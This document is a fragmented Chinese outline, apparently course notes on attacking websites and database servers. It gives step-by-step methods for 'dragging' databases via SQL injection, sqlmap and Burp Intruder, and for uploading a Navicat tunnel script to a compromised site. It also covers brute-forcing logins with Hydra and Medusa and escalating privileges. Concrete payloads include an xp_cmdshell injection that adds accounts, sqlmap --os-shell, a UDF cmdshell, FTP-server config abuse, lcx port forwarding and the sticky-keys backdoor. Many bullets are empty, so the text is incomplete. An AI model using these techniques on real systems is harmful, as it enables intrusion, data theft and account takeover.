　● 导出表数据（纯数据）

　● 导出表结构以及数据（完全复制）

　● 不支持外连接 ● SQL 注入 ● SQLMap ● --dump

　 ● --csv-del ● --output-dir ● --dump-format ● Burp Suite ● 比 SQLmap更加灵活且稳定 ● 获取数据前需要确定的信息：

　● 表结构 ● 可交由 SQLMap ● -u --current-db ● -u -D --tables ● -u -D -T --columns ● 导出数据条数，确定最后的主键 ID ● sqlmap ● -u -D -T --count ● -u -D --sql-query="SQL语句"

　 ● 构造好导出的 SQL语句，抓取数据 ● BP

　intruder 模块，构造 sql语句

　● 设置变量：uid

　 ● 设置 payload：numbers

　0~23308，step=1

　● 选择抓取的数据 ● 【Option】

　【Grep Extract】【add】【Fetch Response】，返回信息中选取你要抓取的内容，BP会根据选取的内容自动生成正则表达式

　 ● 点击【OK】，继续添加抓取邮箱、密码的正则表达式 ● 【Start attack】，抓取完数据后，选择【Save】→【Result Table】

　 ● 剔除空白行：分页技术

　● 【select * from table limit I,N】,变量 I，范围 1-count，N=1

　● 主流数据库常用的分页语句如下：

　● Postgre SQL ● 【select * from table limit I offset N 】

　● Oracle ● 【select t2.* from (select rownum r,t1.* from table t1 where rownum<N) t2 where t2.r>I 】

　● Mysql ● 【select * from table limit I,N 】

　● SQL Server ● 【select * from (select top I+N * from table) a where id not in (select top I id from table) 】

　● SQLServer 分页的写法很多，这是其中最简单的一种，效率较低，是用于小数据 ● 其他工具：火车头、八爪鱼等 ● 越权访问 ● 页面中显示数据的列全部遍历出来，依旧是 BP

　● 本地导出

　● 已有网站权限，上传拖库脚本进行拖库 ● 步骤 ● 连接数据库信息：库名、账号、密码、端口信息等 ● 填写导出信息：表、列、行数、保存路径等 ●

　 ● 小巧且强大的拖库脚本 ● Navicat安装目录下：均使用【HTTP通道连接】，突破【不允许远程连接数据库】

　● 【ntunnel_mysql.php】：MySQL ● 【ntunnel_pgsql.php】：PostgreSql ● 【ntunnel_sqlite.php】：SQLite ● 使用方法：

　● 上传拖库脚本（ntunnel_mysql.php改名位 db.php）到网站的可访问目录（如根目录）

　● 打开 Navicat，新建连接→mysql，选择【HTTP选项卡】，勾选使用 HTTP通道，在通道栏写入上传的脚本的 URL http://www.xxx.com/db.php，其他保持默认即可 ● 返回【常规选项卡】，填写连接名、用户名以及密码。注意：要连接的主机 IP地址应该为“Localhost”或“127.0.0.1”，代表本地连接。填写完后就可以连接到 Mysql 数据库 ● 综合篇

　● 暴力破解测试

　● C/S 架构破解

　● SQL Server ● 爆破工具：Nmap、X-scan、Hydra、CrackDB等 ● Hydra支持破解的服务：FTP、MSSQL、MySQL、POP3、SSH 等 ● 语法：

　● 示例：未指定文件路径，Hydra将在本目录下查找文件

　 ● 爆破成功后，拖库+提权 ● SQLMap连接，反弹一个与系统交互的 Shell来提权 ● 【sqlmap -d "mssql://user:pwd@192.168.1.110:1433/master" --os-shell】

　● 对多台服务器同时探测弱口令，撒网式攻击，批量入侵服务器的一种方式 ● MySQL ● Hydra略 ● Medusa：迅速、大规模并行、模块化的暴力破解程序 ● 特点：

　● 基本使用方法：

　● 【medusa -d】查看可以利用的模块 ● 【medusa -M mysql -q】查看指定模块的帮助信息，以 mysql为例 ● 【普通猜解】【mysql hash】

　● 语法：

　● h|H

　u|U

　 p|P

　 C

　 M

　OPT

　● 常用参数以及说明

　● 示例：-h -u -P -M mysql

　● 其他示例：

　 ● B/S 架构破解

　● WordPress为例，暴力破解 B/S 架构的 Web Form ● 用户名可参考文章作者 ● Hydra、Medusa也都支持表单破解 ● BurpSuite ● 先寻找一个标志位，登录成功与失败的区别点

　● 爆破步骤 ● 1、获取设置循环变量 ●

　● 2、设置 Payload ● 3、设置标识位 ●

　 ● 4、寻找破解后的密码 ●

　 ● 专用扫描工具：WpScan ● 暴力破解案例

　● 攻击 OA 系统 ● 搜集用户名等信息 ● 邮箱

　● 错误信息提示

　 ● 破解验证码 ● 较长时间内有效，则有可能会被爆破

　●

　● 防止暴力破解

　● 密码的复杂性 ● 密码策略

　● 验证码措施 ●

　● 登陆日志（限制登录次数）

　●

　● 旁注攻击

　● 概述

　● 端 服务器端 Web 架构

　● 一个服务器可能存在多个网站或多个数据库，寻找薄弱点进行攻击，数据库、提权等危害

　 ● 子域名

　● IP 逆向查询

　● 【网站】到 【IP 】再到【该 IP 部署的所有网站】

　● IP反查网站：

　● http://tool.chinaz.com/Same/ ● http://dns.aizhan.com ● http://www.114best.com/ip/ ● 调用过了必应搜索引擎的接口（也有很多其他接口）来抓取

　● 旁注查询软件 ● SQL 跨库查询

　● 权限最小原则

　 ● 目录越权

　● 配置不当

　 ● 构造注入点

　● 根据相应的脚本来构造一个注入点

　● 各脚本注入点 ● aspx 版本：连接数据库，并查询 id 数据，用户输入参数 id 没有任何过滤直接拼接在字符串中

　 ● PHP

　● JSP

　 ● 数据库账户信息，SQLMap，权限够高就可以将 Shell数据备份到指定目录，甚至提权等。

　● CDN

　● 内容分发网络：尽可能地避开互联网上有可能影响数据传输速度和稳定性的瓶颈、环节，使内容的传输速度更快、更稳定 ● 服务器使用 CDN 后，真实 IP 将会隐藏起来 ● 使用场景：

　● 使用 CDN 的效果

　● CDN （加速）原理：将源服务器上可以缓存的文件（静态文件、图片、JS、CSS等）下载到缓存服务器，当用户访问你得域名时，将会访问缓存服务器，而不是直接去访问源服务器 ● 示例：

　 ● java 判断 CDN

　● 安全宝、加速乐等都提供了免费的 CDN供用户使用。

　● CDN 缺点：攻击者可以直接攻击 CDN节点造成网站无法访问的现象 ● 搜集真实 IP 的方法 ● phpinfo()

　● 子域名：仅对主站做了 CDN，子域名和主站存放在一台服务器中

　 ● 观察 IP 变化

　● 小结：

　● 提权

　● 一般分类：溢出提权、第三方组件提权 ● 溢出提权

　● 远程（少），本地（主）

　● 方法 ● linux ● uname -a 内核版本，找对应版本的提权脚本

　● 反弹 shell（回显、交互、便利等好处）

　● 上传本地溢出 EXP 并执行，得到 root shell ● windows ● 探测脚本信息 ● 执行权限：

　● 【ASP】需要【wscript.shell】命令执行组件 ● 【ASP.NET】依靠【.NET Framework】

　● 【JSP】依靠【JVM】调用系统命令

　● 执行简单的系统命令 ● 可能存在禁用 cmd.exe，但提权 EXP可执行即可。

　● 上传.aspx的 shell来执行命令

　● 常见 CMD参数如下：

　● 关键在于执行权限

　 ● 第三方组件提权

　如：.NET framework、PcAnywhere、MySQL、SQL Server等 ● 信息搜集 ● 服务器支持的 脚本语言 ● 服务器 端口探测 ● 目的：探测服务、软件，针对特定服务或软件提权 ● 方式：

　● 本地扫描：webshell ● 远程扫描：nmap -A -p- ● 执行系统命令查看（最准确）：netstat -an ● 搜集 路径信息 ● 可访问的路径、软件的安装路径等 ● 注册表：如【HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\】

　● 数据库提权 ● 成功率高 ● SQL Server ● SQl Server 提权主要依据一个特殊的存储过程：xp_cmdshell ，他可以调用系统命令：如【net user x x /add & net localgroup administrator x /add 】

　● 条件：只有 sysadmin 权限可以使用”xp_cmdshell“ ● xp_cmdshell关闭的报错、开启 ● 报错

　● 开启 ● 注意：不是 SA 账户，只要有 sysadmin权限就可以使用 xp_cmdshell提权

　 ● SQL Server 提权：注入点 和 得到数据库账户信息 ● 注入点 ● 【id=1; exec master..xp_cmdshell "net user 1 1 /add"--】

　● 【sqlmap -u --os-cmd="net user"】

　● 得到数据库账户信息 ● 得到 SA 的账密，外（远程）连接 或 本地连接 提权 ● 账户信息一般可以在脚本文件中找到：

　● conn.asp ● web.config ● db.inc等文件 ● 工具 ● 菜刀的数据库连接和管理

　 ● 其他提权方式：sqlserveragent、sp_oacreate、xp_regwrite ● MySQL ● 自定义函数 提权 ● UDF（User defined Function）提权

　● 自动化软件、提权脚本 ● SQLMap也存在 UDF 可以使用对 Mysql提权 ● 一个简单的 MySQL 自动化提权脚本 ● 连接数据库

　● MySQL 安装路径中的 root用户密码：/data/mysql/user.MYD，此文件保存着数据库中的所有账户信息 ● 导出 UDF ● 执行命令 ● 其他方法：写文件到启动项等

　● create function cmdshell returns string soname "udf.dll" ● select cmdshell("command"); ● FTP 提权 ● 简介 ●

　● 成因，以及利用 ●

　 ● Serv-U 提权 ● 根据版本寻找提权漏洞以及利用方法，Serv-U 配置文件 ServUAdmin.exe 16 进制打开配置文件，可获得默认账密

　 ● 修改配置文件，Serv-U 安装目录下“ServUDaemon.ini”配置文件，保存了所有的 FTP账户信息

　● 可以手工添加一个 FTP账户，让其拥有足够的权限

　 ● Gene6 FTP 提权 同 Serv-U 一样也是一款搭建 FTP环境的软件 ● 配置文件：安装目录/RemoteAdmin/Remote.ini，即远程管理账户信息

　 ● Password：MD5 加密后的密码，默认 MD5，也可以明文、SHA1、MD5 加随机数的加密形式展现

　● 解密后得知管理员的账密，远程连接（因为 G6 FTP默认不允许远程连接，需要LXC进行端口转发）并提权 ● 服务器端：lcx.exe -tran 1234 127.0.0.1 8021

　 ● 连接成功后"域→任意域→用户"，新建 FTP用户，根据提示输入新的 FTP账户、密码以及用户主目录信息后，在弹出的新界面中选择“访问权限”

　● 上传新建用户并提权的 BAT，执行，验证

　 ● 关键就是【端口转发】+【FTP执行 BAT文件】

　● FileZilla 提权 ● 概述：14147，【FileZillaServer interface.xml】：管理员信息；【FileZilla Server.xml】：用户信息

　● 【FileZillaServer interface.xml】

　● 【FileZilla Server.xml】

　 ● 具体步骤：sethc.exe，也就是 粘滞键漏洞，远程桌面触发进行提权即可

　 ● FlashFXP 提权 ●

　 ● PcAnywhere 提权 ● 远程控制软件（相同的软件很多，如 TeamView）。服务器安装被控端，主控端才能控制服务器 ● 连接流程：服务器端配置连接信息，客户端连接即可

　 ● PcAnywhere提权：配置文件密码破解。

　● 总结

　 ● 虚拟主机提权

　● 简介

　● 0day提权

　● 提权辅助

　● 3389 端口（RDB）

　）

　● 开启：我的电脑，属性，远程，启用，3389 就会打开 ● 默认只允许管理员远程登录，其他需要授权

　● Windows自带了远程桌面连接工具：cmd 下 mstsc，system32 目录下的 mstsc.exe，启动后可以图形化管理 ● 攻击者 shell环境 下开启 3389 ● 以下存为.bat，运行即可开启 3389

　● 针对 3389暴力破解也可以 ● 面对批量化攻击，改端口或者强密码 ● 获取 rdb服务端口：nmap、cmdshell下的 netstat -an、专...